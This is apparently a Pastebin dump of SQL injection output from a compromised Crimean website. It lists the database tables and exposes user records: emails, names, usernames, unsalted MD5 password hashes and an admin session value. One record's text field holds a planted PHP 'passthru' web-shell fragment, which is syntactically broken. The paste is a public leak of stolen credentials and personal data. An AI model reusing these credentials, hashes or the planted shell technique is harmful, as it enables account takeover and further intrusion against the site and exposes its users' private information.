Advertisement
AnonKR

Untitled

Mar 19th, 2014
354
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.79 KB | None | 0 0
  1. available databases [3]:
  2. [*] crimeaua
  3. [*] cris
  4. [*] information_schema
  5.  
  6. Database: crimeaua
  7. [27 tables]
  8. +--------------------+
  9. | ae_articles |
  10. | ae_discussions |
  11. | ae_files |
  12. | ae_images |
  13. | ae_login |
  14. | ae_messages |
  15. | ae_relatedarticles |
  16. | ae_sections |
  17. | ae_stats |
  18. | ae_surveyblock |
  19. | ae_surveys |
  20. | ae_users |
  21. | category |
  22. | links |
  23. | plans |
  24. | poll_comment |
  25. | poll_config |
  26. | poll_data |
  27. | poll_index |
  28. | poll_ip |
  29. | poll_log |
  30. | poll_templates |
  31. | poll_templateset |
  32. | poll_user |
  33. | price_hour |
  34. | sections |
  35. | sites |
  36. +--------------------+
  37.  
  38. Database: crimeaua
  39. Table: ae_login
  40. [4 columns]
  41. +---------+------------------+
  42. | Column | Type |
  43. +---------+------------------+
  44. | ID | int(10) unsigned |
  45. | loginID | varchar(100) |
  46. | logtime | varchar(100) |
  47. | userID | int(10) unsigned |
  48. +---------+------------------+
  49.  
  50. Database: cris
  51. [5 tables]
  52. +---------------+
  53. | advertisiment |
  54. | cards |
  55. | news |
  56. | plans |
  57. | price_hour |
  58. +---------------+
  59.  
  60. Database: crimeaua
  61. Table: ae_users
  62. [9 columns]
  63. +-----------+------------------+
  64. | Column | Type |
  65. +-----------+------------------+
  66. | email | varchar(255) |
  67. | fullname | varchar(100) |
  68. | ID | int(10) unsigned |
  69. | language | char(2) |
  70. | otherinfo | text |
  71. | password | varchar(100) |
  72. | photo | varchar(255) |
  73. | position | tinyint(4) |
  74. | user | varchar(30) |
  75. +-----------+------------------+
  76.  
  77. Database: crimeaua
  78. Table: ae_users
  79. [4 entries]
  80. +--------------------------+---------------+----+----------+------------------------------------------------------+----------------------------------+-------+----------+-------+
  81. | email | fullname | ID | language | otherinfo | password | photo | position | user |
  82. +--------------------------+---------------+----+----------+------------------------------------------------------+----------------------------------+-------+----------+-------+
  83. | youremail@yourdomain.com | Administrator | 1 | EN | This is the main user - administrator of the system. | 202cb962ac59075b964b07152d234b70 | NULL | 1 | admin |
  84. | venya@pop.cris.net | €€€€€€€ €€€€€ | 2 | EN | NULL | 098f6bcd4621d373cade4e832627b4f6 | NULL | 3 | €€€€ |
  85. | NULL | tester | 3 | EN | <? passthru($c(; ?> | 202cb962ac59075b964b07152d234b70 | NULL | 3 | test |
  86. | abc@abc.ru | abc | 4 | EN | test | 900150983cd24fb0d6963f7d28e17f72 | NULL | 1 | abc |
  87. +--------------------------+---------------+----+----------+------------------------------------------------------+----------------------------------+-------+----------+-------+
  88.  
  89. Database: crimeaua
  90. Table: poll_user
  91. [1 entry]
  92. +------------+----------------------------------+---------+----------+----------------------------------+
  93. | last_visit | session | user_id | username | userpass |
  94. +------------+----------------------------------+---------+----------+----------------------------------+
  95. | 1105537152 | 9aea353f7649ef45231ee8fadac90ce4 | 1 | admin | 136d76b157759e4d469f9362c001845e |
  96. +------------+----------------------------------+---------+----------+----------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement